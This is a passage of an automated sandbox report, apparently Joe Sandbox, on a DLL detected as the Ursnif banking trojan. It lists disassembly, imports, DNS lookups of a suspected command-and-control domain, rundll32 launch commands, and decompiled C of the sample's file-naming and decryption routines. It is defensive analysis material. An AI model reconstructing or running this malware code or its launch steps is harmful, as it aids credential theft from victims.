                      mov ecx, dword ptr [010137A0h]
                      test ecx, ecx
                      je 00007F6174C5A77Eh
                      push dword ptr [ebp+10h]
                      push esi
                      push dword ptr [ebp+08h]
                      call ecx
                      mov dword ptr [ebp-1Ch], eax
                      test eax, eax
                      je 00007F6174C5A827h
                      push dword ptr [ebp+10h]
                      push esi
                      push dword ptr [ebp+08h]
                      call 00007F6174C5A586h
                      mov dword ptr [ebp-1Ch], eax
                      test eax, eax
                      je 00007F6174C5A810h
                      mov ebx, dword ptr [ebp+10h]
                      push ebx
                      push esi
                      push dword ptr [ebp+08h]
                      call 00007F6174C52768h
                      mov edi, eax
                      mov dword ptr [ebp-1Ch], edi
                      cmp esi, 01h
                      jne 00007F6174C5A79Ah
                      test edi, edi
                      jne 00007F6174C5A796h
                      push ebx
                      push eax
                      push dword ptr [ebp+08h]
                      call 00007F6174C52750h
                      push ebx
                      push edi
                      push dword ptr [ebp+08h]
                      call 00007F6174C5A54Ch
                      mov eax, dword ptr [010137A0h]
                      test eax, eax
                      je 00007F6174C5A779h
                      push ebx
                      push edi
                      push dword ptr [ebp+08h]
                      call eax

                      Data Directories

                      Name                                  Virtual Address  Virtual Size  Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x5bdf0          0x6d          .text
                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x106c200        0x64          .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x106d000        0x2334        .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x1080           0x38          .text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x18b68          0x40          .text
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IAT             0x106c000        0x200         .idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                      Sections

                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                      .text   0x1000           0x5ae5d       0x5b000   False     0.629630623283   data       6.14182941666  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .data   0x5c000          0x100f10c     0x1c00    unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .idata  0x106c000        0xc34         0xe00     False     0.399832589286   data       5.23220949273  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc  0x106d000        0x2334        0x2400    False     0.759331597222   data       6.62458632125  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Imports

                      DLL           Import
                      KERNEL32.dll  SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, SetSystemPowerState, CreateFileA, GetWindowsDirectoryA, GetCommandLineA, CreateSemaphoreA, FormatMessageA, GetLocalTime, GetSystemTimeAsFileTime, HeapWalk, HeapCompact, HeapFree, HeapAlloc, VirtualProtectEx, OutputDebugStringW, LoadLibraryExW, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, HeapReAlloc, GetModuleFileNameW, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, GetFileType, GetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, GetLastError, RaiseException, RtlUnwind, GetCurrentThreadId, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ExitProcess, GetModuleHandleExW, HeapSize, GetProcessHeap, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP
                      ole32.dll     OleUninitialize, OleInitialize, OleSetContainedObject
                      ADVAPI32.dll  AllocateAndInitializeSid, SetEntriesInAclA, StartServiceCtrlDispatcherW, SetServiceStatus, RegisterServiceCtrlHandlerA, QueryServiceStatus, OpenServiceA, OpenSCManagerA, DeleteService, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey, LookupPrivilegeValueA, OpenProcessToken, OpenThreadToken, GetTokenInformation, FreeSid, InitializeSecurityDescriptor, SetSecurityDescriptorDacl
                      hlink.dll

                      Exports

                      Name         Ordinal  Address
                      Child        1        0x103dbb0
                      Forcearea    2        0x103dc60
                      Stationmeat  3        0x103d3d0

                      Network Behavior

                      Network Port Distribution

                      UDP Packets


                      DNS Queries

                      Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class
                      Jun 3, 2021 18:06:48.251032114 CEST  192.168.2.4  8.8.8.8  0xd976    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)
                      Jun 3, 2021 18:06:48.314477921 CEST  192.168.2.4  8.8.8.8  0x65f0    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)
                      Jun 3, 2021 18:06:48.390541077 CEST  192.168.2.4  8.8.8.8  0xf05a    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)
                      Jun 3, 2021 18:06:49.089580059 CEST  192.168.2.4  8.8.8.8  0x72bc    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)
                      Jun 3, 2021 18:06:49.145909071 CEST  192.168.2.4  8.8.8.8  0x2930    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)
                      Jun 3, 2021 18:06:49.201268911 CEST  192.168.2.4  8.8.8.8  0xd559    Standard query (0)  app.buboleinov.com  A (IP address)  IN (0x0001)

                      DNS Answers

                      Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                      CName                         Address  Type                    Class
                      Jun 3, 2021 18:06:29.328186989 CEST  8.8.8.8    192.168.2.4  0xbf1e    No error (0)    prda.aadg.msidentity.com  www.tm.a.prd.aadg.akadns.net           CNAME (Canonical name)  IN (0x0001)
                      Jun 3, 2021 18:06:48.301836967 CEST  8.8.8.8    192.168.2.4  0xd976    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)
                      Jun 3, 2021 18:06:48.377386093 CEST  8.8.8.8    192.168.2.4  0x65f0    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)
                      Jun 3, 2021 18:06:48.439580917 CEST  8.8.8.8    192.168.2.4  0xf05a    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)
                      Jun 3, 2021 18:06:49.138902903 CEST  8.8.8.8    192.168.2.4  0x72bc    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)
                      Jun 3, 2021 18:06:49.194487095 CEST  8.8.8.8    192.168.2.4  0x2930    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)
                      Jun 3, 2021 18:06:49.252738953 CEST  8.8.8.8    192.168.2.4  0xd559    Name error (3)  app.buboleinov.com        none                          none     A (IP address)          IN (0x0001)

                      System Behavior

                      General

                      Start time:18:05:03
                      Start date:03/06/2021
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll'
                      Imagebase:0x960000
                      File size:116736 bytes
                      MD5 hash:542795ADF7CC08EFCF675D65310596E8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Start time:18:05:04
                      Start date:03/06/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
                      Imagebase:0x11d0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:05:04
                      Start date:03/06/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child
                      Imagebase:0x200000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Start time:18:05:04
                      Start date:03/06/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
                      Imagebase:0x200000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Start time:18:05:08
                      Start date:03/06/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea
                      Imagebase:0x200000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Start time:18:05:14
                      Start date:03/06/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat
                      Imagebase:0x200000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Start time:18:06:45
                      Start date:03/06/2021
                      Path:C:\Program Files\internet explorer\iexplore.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                      Imagebase:0x7ff601e70000
                      File size:823560 bytes
                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:06:46
                      Start date:03/06/2021
                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2
                      Imagebase:0x8a0000
                      File size:822536 bytes
                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:06:47
                      Start date:03/06/2021
                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2
                      Imagebase:0x8a0000
                      File size:822536 bytes
                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                        Executed Functions

                        C-Code - Quality: 93%
                        			E00504E9C(signed char* __eax, intOrPtr* _a4) {
                        				signed int _v12;
                        				void* _v16;
                        				CHAR* _v20;
                        				struct _FILETIME _v28;
                        				void* _v32;
                        				void* _v36;
                        				char* _v40;
                        				signed int _v44;
                        				long _v344;
                        				struct _WIN32_FIND_DATAA _v368;
                        				signed int _t72;
                        				void* _t74;
                        				signed int _t76;
                        				void* _t78;
                        				intOrPtr _t81;
                        				CHAR* _t83;
                        				void* _t85;
                        				signed char _t89;
                        				signed char _t91;
                        				intOrPtr _t93;
                        				void* _t96;
                        				long _t99;
                        				int _t101;
                        				signed int _t109;
                        				char* _t111;
                        				void* _t113;
                        				int _t119;
                        				char _t128;
                        				void* _t134;
                        				signed int _t136;
                        				char* _t139;
                        				signed int _t140;
                        				char* _t141;
                        				char* _t146;
                        				signed char* _t148;
                        				int _t151;
                        				void* _t152;
                        				void* _t153;
                        				void* _t154;
                        				void* _t165;
                        
                        				_v12 = _v12 & 0x00000000;
                        				_t148 = __eax;
                        				_t72 =  *0x50a2cc; // 0x63699bc3
                        				_t74 = RtlAllocateHeap( *0x50a290, 0, _t72 ^ 0x63699ac7);
                        				_v20 = _t74;
                        				if(_t74 == 0) {
                        					L36:
                        					return _v12;
                        				}
                        				_t76 =  *0x50a2cc; // 0x63699bc3
                        				_t78 = RtlAllocateHeap( *0x50a290, 0, _t76 ^ 0x63699bce);
                        				_t146 = 0;
                        				_v36 = _t78;
                        				if(_t78 == 0) {
                        					L35:
                        					HeapFree( *0x50a290, _t146, _v20);
                        					goto L36;
                        				}
                        				_t136 =  *0x50a2cc; // 0x63699bc3
                        				memset(_t78, 0, _t136 ^ 0x63699bce);
                        				_t81 =  *0x50a2d0; // 0x2add5a8
                        				_t154 = _t153 + 0xc;
                        				_t5 = _t81 + 0x50b825; // 0x73797325
                        				_t83 = E00501000(_t5);
                        				_v20 = _t83;
                        				if(_t83 == 0) {
                        					L34:
                        					_t68 =  &_v36; // 0x502779
                        					HeapFree( *0x50a290, _t146,  *_t68);
                        					goto L35;
                        				}
                        				_t134 = 0xffffffffffffffff;
                        				_v28.dwLowDateTime = 0x63699bce;
                        				_v28.dwHighDateTime = 0x63699bce;
                        				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                        				_v32 = _t85;
                        				if(_t85 != 0x63699bce) {
                        					GetFileTime(_t85,  &_v28, 0, 0);
                        					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                        					asm("adc dword [ebp-0x14], 0xc9"); // executed
                        					FindCloseChangeNotification(_v32); // executed
                        				}
                        				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                        				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                        				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                        				 *_t148 = _t91;
                        				_v32 = _t91 & 0x000000ff;
                        				_t93 =  *0x50a2d0; // 0x2add5a8
                        				_t16 = _t93 + 0x50b846; // 0x642e2a5c
                        				_v40 = _t146;
                        				_v44 = _t89 & 0x000000ff;
                        				__imp__(_v20, _t16);
                        				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                        				_v16 = _t96;
                        				if(_t96 == _t134) {
                        					_t146 = 0;
                        					goto L34;
                        				}
                        				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                        				while(_t99 > 0) {
                        					_t101 = FindNextFileA(_v16,  &_v368); // executed
                        					if(_t101 == 0) {
                        						FindClose(_v16);
                        						_v16 = FindFirstFileA(_v20,  &_v368);
                        						_v28.dwHighDateTime = _v344;
                        						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                        					}
                        					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                        				}
                        				_v12 = _v12 & 0x00000000;
                        				while(1) {
                        					_t109 = _v44;
                        					if(_v12 <= _t109) {
                        						goto L15;
                        					}
                        					_t140 = _v12;
                        					if(_t140 > _v32) {
                        						_t65 =  &_v36; // 0x502779
                        						_t141 =  *_t65;
                        						 *_a4 = _t141;
                        						while(1) {
                        							_t128 =  *_t141;
                        							if(_t128 == 0) {
                        								break;
                        							}
                        							if(_t128 < 0x30) {
                        								 *_t141 = _t128 + 0x20;
                        							}
                        							_t141 = _t141 + 1;
                        						}
                        						_v12 = 1;
                        						FindClose(_v16); // executed
                        						_t146 = 0;
                        						goto L35;
                        					}
                        					_t165 = _t140 - _t109;
                        					L15:
                        					if(_t165 == 0 || _v12 == _v32) {
                        						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                        						_t139 = _v40;
                        						_t151 = _t111 -  &(_v368.cFileName);
                        						_t113 = 0;
                        						if(_t139 != 0) {
                        							_t48 = _t151 - 4; // -4
                        							_t113 = _t48;
                        							if(_t113 > _t151) {
                        								_t113 = 0;
                        							}
                        						}
                        						if(_t151 > 4) {
                        							_t151 = 4;
                        						}
                        						_t51 =  &_v36; // 0x502779
                        						memcpy( *_t51 + _t139, _t152 + _t113 - 0x140, _t151);
                        						_t154 = _t154 + 0xc;
                        						_v40 =  &(_v40[_t151]);
                        					}
                        					do {
                        						_t119 = FindNextFileA(_v16,  &_v368); // executed
                        						if(_t119 == 0) {
                        							FindClose(_v16);
                        							_v16 = FindFirstFileA(_v20,  &_v368);
                        						}
                        					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                        					_v12 = _v12 + 1;
                        				}
                        			}

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,63699BC3,0050A380), ref: 00504EC7
                        • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00504EE9
                        • memset.NTDLL ref: 00504F03
                          • Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00504F1C,73797325), ref: 00501011
                          • Part of subcall function 00501000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0050102B
                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00504F41
                        • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00504F55
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00504F6C
                        • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00504F78
                        • lstrcat.KERNEL32(?,642E2A5C), ref: 00504FB9
                        • FindFirstFileA.KERNELBASE(?,?), ref: 00504FCF
                        • CompareFileTime.KERNEL32(?,?), ref: 00504FED
                        • FindNextFileA.KERNELBASE(00503EAC,?), ref: 00505001
                        • FindClose.KERNEL32(00503EAC), ref: 0050500E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050501A
                        • CompareFileTime.KERNEL32(?,?), ref: 0050503C
                        • StrChrA.SHLWAPI(?,0000002E), ref: 0050506F
                        • memcpy.NTDLL(y'P,?,00000000), ref: 005050A8
                        • FindNextFileA.KERNELBASE(00503EAC,?), ref: 005050BD
                        • FindClose.KERNEL32(00503EAC), ref: 005050CA
                        • FindFirstFileA.KERNEL32(?,?), ref: 005050D6
                        • CompareFileTime.KERNEL32(?,?), ref: 005050E6
                        • FindClose.KERNELBASE(00503EAC), ref: 0050511B
                        • HeapFree.KERNEL32(00000000,y'P,73797325), ref: 0050512D
                        • HeapFree.KERNEL32(00000000,?), ref: 0050513D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                        • String ID: y'P
                        • API String ID: 2944988578-365914460
                        • Opcode ID: c741098b64e431d86ab9485678f1340a0657155e335fb3fccc752f5b6a3ca633
                        • Instruction ID: b0f54f8092777ee5799bf1a6b3be6f73e6817da7faaa4083ede87446cf2ac64e
                        • Opcode Fuzzy Hash: c741098b64e431d86ab9485678f1340a0657155e335fb3fccc752f5b6a3ca633
                        • Instruction Fuzzy Hash: 41812A71D0020AAFDF11DFA5DC98AEFBBB9FB54300F104466E505E62A1E7719A48DFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E005035A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                        				int _v8;
                        				long* _v12;
                        				int _v16;
                        				BYTE* _v20;
                        				long* _v24;
                        				void* _v39;
                        				char _v40;
                        				void _v56;
                        				int _v60;
                        				intOrPtr _v64;
                        				void _v67;
                        				char _v68;
                        				void* _t61;
                        				int _t68;
                        				signed int _t76;
                        				int _t79;
                        				int _t81;
                        				int _t85;
                        				long _t86;
                        				int _t90;
                        				signed int _t94;
                        				int _t101;
                        				BYTE* _t102;
                        				int _t103;
                        				void* _t104;
                        				void* _t105;
                        				void* _t106;
                        
                        				_t103 = __eax;
                        				_t94 = 6;
                        				_v68 = 0;
                        				memset( &_v67, 0, _t94 << 2);
                        				_t105 = _t104 + 0xc;
                        				asm("stosw");
                        				asm("stosb");
                        				_v40 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosw");
                        				asm("stosb");
                        				_t61 =  *0x50a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                        				if(_t61 == 0) {
                        					_a8 = GetLastError();
                        				} else {
                        					_t101 = 0x10;
                        					memcpy( &_v56, _a8, _t101);
                        					_t106 = _t105 + 0xc;
                        					_v60 = _t101;
                        					_v67 = 2;
                        					_v64 = 0x660e;
                        					_v68 = 8;
                        					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                        					if(_t68 == 0) {
                        						_a8 = GetLastError();
                        					} else {
                        						_push(0);
                        						_push( &_v40);
                        						_push(1);
                        						_push(_v12);
                        						if( *0x50a0dc() == 0) {
                        							_a8 = GetLastError();
                        						} else {
                        							_t18 = _t103 + 0xf; // 0x10
                        							_t76 = _t18 & 0xfffffff0;
                        							if(_a4 != 0 && _t76 == _t103) {
                        								_t76 = _t76 + _t101;
                        							}
                        							_t102 = E00505C4E(_t76);
                        							_v20 = _t102;
                        							if(_t102 == 0) {
                        								_a8 = 8;
                        							} else {
                        								_v16 = 0;
                        								_a8 = 0;
                        								while(1) {
                        									_t79 = 0x10;
                        									_v8 = _t79;
                        									if(_t103 <= _t79) {
                        										_v8 = _t103;
                        									}
                        									memcpy(_t102, _a12, _v8);
                        									_t81 = _v8;
                        									_a12 = _a12 + _t81;
                        									_t103 = _t103 - _t81;
                        									_t106 = _t106 + 0xc;
                        									if(_a4 == 0) {
                        										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                        									} else {
                        										_t85 =  *0x50a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                        									}
                        									if(_t85 == 0) {
                        										break;
                        									}
                        									_t90 = _v8;
                        									_v16 = _v16 + _t90;
                        									_t102 =  &(_t102[_t90]);
                        									if(_t103 != 0) {
                        										continue;
                        									} else {
                        										L17:
                        										 *_a16 = _v20;
                        										 *_a20 = _v16;
                        									}
                        									goto L21;
                        								}
                        								_t86 = GetLastError();
                        								_a8 = _t86;
                        								if(_t86 != 0) {
                        									E00502A03(_v20);
                        								} else {
                        									goto L17;
                        								}
                        							}
                        						}
                        						L21:
                        						CryptDestroyKey(_v12);
                        					}
                        					CryptReleaseContext(_v24, 0);
                        				}
                        				return _a8;
                        			}

                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00501B16,00000001,00506301,00000000), ref: 005035D9
                        • memcpy.NTDLL(00501B16,00506301,00000010,?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000), ref: 005035F2
                        • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0050361B
                        • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00503633
                        • memcpy.NTDLL(00000000,00000000,02FE9630,00000010), ref: 00503685
                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02FE9630,00000020,?,?,00000010), ref: 005036AE
                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02FE9630,?,?,00000010), ref: 005036C5
                        • GetLastError.KERNEL32(?,?,00000010), ref: 005036DD
                        • GetLastError.KERNEL32 ref: 0050370F
                        • CryptDestroyKey.ADVAPI32(00000000), ref: 0050371B
                        • GetLastError.KERNEL32 ref: 00503723
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00503730
                        • GetLastError.KERNEL32(?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00503738
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
